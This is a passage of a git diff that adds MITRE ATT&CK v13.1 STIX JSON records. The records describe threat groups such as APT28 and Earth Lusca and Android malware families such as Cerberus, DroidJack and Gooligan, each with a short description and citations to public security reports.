Retrieved September 11, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" + }, + { + "source_name": "Microsoft STRONTIUM Aug 2019", + "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021", + "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.", + "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + }, + { + "source_name": "SecureWorks TG-4127", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" + }, + { + "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017", + "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. 
Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures" + }, + { + "source_name": "Secureworks IRON TWILIGHT Profile", + "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034.json new file mode 100644 index 0000000000000000000000000000000000000000..0e0379a6909dc9831113c1c743fd5316c30b05e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--ff9eff1c-ed23-460d-9ffb-cda4c583cb47", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-17T19:51:56.531Z", + "name": "Earth Lusca", + "description": "[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)\n\n[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)", + "aliases": [ + "Earth Lusca", + "TAG-22" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034", + "created": "2022-07-01T20:12:30.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1006", + "external_id": "G1006" + }, + { + "source_name": "TAG-22", + "description": "(Citation: Recorded 
Future TAG-22 July 2021)" + }, + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca\u2019s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + }, + { + "source_name": "Recorded Future TAG-22 July 2021", + "description": "INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.", + "url": "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--007ebf84-4e14-44c7-a5aa-151d5de85320.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--007ebf84-4e14-44c7-a5aa-151d5de85320.json new file mode 100644 index 0000000000000000000000000000000000000000..36e4653bcb0a2437cb4ea4118974bf8b6254e8a0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--007ebf84-4e14-44c7-a5aa-151d5de85320.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--f5c3a1e8-8ba1-46ed-a222-f96ffbf14117", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CarbonSteal" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "type": "malware", + "created": "2020-11-10T16:50:38.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0529", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0529" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-09-20T13:54:19.819Z", + "name": "CarbonSteal", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9.json new file mode 100644 index 0000000000000000000000000000000000000000..3a76d7bfa053d0b1ae39670ee21a49cf81015db1 
--- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--c15b4cf3-aa90-45be-823b-4e487eb79524", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Cerberus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "type": "malware", + "created": "2020-06-26T15:32:24.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0480", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0480" + }, + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-09-11T15:43:49.079Z", + "name": "Cerberus", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1.json new file mode 100644 index 0000000000000000000000000000000000000000..7d3d250d6428156a04ed6893e0e23cda6d6f3100 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--57f7e21e-562d-47f1-8943-9d01452c7d2f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DroidJack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "created": "2017-10-25T14:48:40.571Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0320", + "url": "https://attack.mitre.org/software/S0320" + }, + { + "source_name": "DroidJack", + "description": "(Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)" + }, + { + "source_name": "Proofpoint-Droidjack", + "url": "https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app", + "description": "Proofpoint. (2016, July 7). DroidJack Uses Side-Load\u2026It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017." + }, + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 \u2013 DroidJack RAT. Retrieved January 20, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. 
(Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", + "modified": "2022-05-20T17:13:16.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DroidJack", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0626c181-93cb-4860-9cb0-dff3b1c13063.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0626c181-93cb-4860-9cb0-dff3b1c13063.json new file mode 100644 index 0000000000000000000000000000000000000000..9636f0d5a429dd1289b672ccba3c1897d9c30c5b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0626c181-93cb-4860-9cb0-dff3b1c13063.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--5ff2e917-8bbe-4331-8856-6c7ea7c4ec6f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Rotexy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "type": "malware", + "created": "2019-09-23T13:36:07.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0411", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0411" + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019." + } + ], + "modified": "2020-09-11T15:53:38.216Z", + "name": "Rotexy", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--085eb36d-697d-4d9a-bac3-96eb879fe73c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--085eb36d-697d-4d9a-bac3-96eb879fe73c.json new file mode 100644 index 0000000000000000000000000000000000000000..b604bef0e549de6240d4cf725920ff6a3af6e99c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--085eb36d-697d-4d9a-bac3-96eb879fe73c.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--76fcd982-8126-4e0e-b45c-9ae3a8725c2f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Stealth Mango", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Stealth Mango" + ], + "type": "malware", + "id": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0328", + "external_id": "S0328" + }, + { + "source_name": "Stealth Mango", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--08784a9d-09e9-4dce-a839-9612398214e8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--08784a9d-09e9-4dce-a839-9612398214e8.json new file mode 100644 index 0000000000000000000000000000000000000000..b3a382c943d2420c0cb859f75dca73148438904e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--08784a9d-09e9-4dce-a839-9612398214e8.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2879eeb7-7ae8-4427-a169-bf3189125418", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Allwinner", + "description": "[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0319", + "external_id": "S0319" + }, + { + "source_name": "Allwinner", + "description": "(Citation: HackerNews-Allwinner)" + }, + { + "source_name": "HackerNews-Allwinner", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018.", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0b9c5d11-651a-4378-b129-5c584d0242c5.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0b9c5d11-651a-4378-b129-5c584d0242c5.json new file mode 100644 index 0000000000000000000000000000000000000000..53b22433f8102b0a2fa0528e58896657ae591e46 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0b9c5d11-651a-4378-b129-5c584d0242c5.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--f1cf39bb-ef09-4f3a-ab49-c4b9445f409d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GoldenEagle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "type": "malware", + "created": "2020-12-24T22:04:27.667Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0551", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0551" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-03-25T16:20:28.165Z", + "name": "GoldenEagle", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--108b2817-bc01-404e-8e1b-8cdeec846326.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--108b2817-bc01-404e-8e1b-8cdeec846326.json new file mode 100644 index 0000000000000000000000000000000000000000..5d563981e67bda3b8f440412fa0f188e62fcefc9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--108b2817-bc01-404e-8e1b-8cdeec846326.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--5528cf9f-38af-4967-8e7d-b4d1a746e54e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T18:53:30.817Z", + "name": "Bread", + "description": "[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store\u2019s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Sergey Persikov, Check Point", + "Jonathan Shimonovich, Check Point", + "Aviran Hazum, Check Point" + ], + "x_mitre_aliases": [ + "Bread", + "Joker" + ], + "type": "malware", + "id": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "created": "2020-05-04T14:04:55.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0432", + "external_id": "S0432" + }, + { + "source_name": "Joker", + "description": "(Citation: Google Bread)" + }, + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--172444ab-97fc-4d94-b142-179452bfb760.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--172444ab-97fc-4d94-b142-179452bfb760.json new file mode 100644 index 0000000000000000000000000000000000000000..692d139633e8f1711b1767acb4954eddd905ae02 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--172444ab-97fc-4d94-b142-179452bfb760.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e5c88e57-198d-4441-abb6-70ea2a8e408a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Judy", + "description": "[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0325", + "external_id": "S0325" + }, + { + "source_name": "Judy", + "description": "(Citation: CheckPoint-Judy)" + }, + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2074b2ad-612e-4758-adce-7901c1b49bbc.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2074b2ad-612e-4758-adce-7901c1b49bbc.json new file mode 100644 index 0000000000000000000000000000000000000000..8e456f085080c494484f4a41aef2887a98bbd8d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2074b2ad-612e-4758-adce-7901c1b49bbc.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7db51091-9cab-48f4-b4bd-cd6a3f732a58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OldBoot", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "created": "2017-10-25T14:48:45.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0285", + "external_id": "S0285" + }, + { + "source_name": "OldBoot", + "description": "(Citation: HackerNews-OldBoot)" + }, + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20d56cd6-8dff-4871-9889-d32d254816de.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20d56cd6-8dff-4871-9889-d32d254816de.json new file mode 100644 index 0000000000000000000000000000000000000000..86c3e91a5360543ad292e3273860a1f280483a47 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20d56cd6-8dff-4871-9889-d32d254816de.json 
@@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--5f03db16-72e5-4167-a3e1-ac0ee7d3ba2a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Gooligan", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Gooligan", + "Ghost Push" + ], + "type": "malware", + "id": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "created": "2017-10-25T14:48:43.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0290", + "external_id": "S0290" + }, + { + "source_name": "Gooligan", + "description": "(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Ghost Push", + "description": "Gooligan has been described as being part of the Ghost 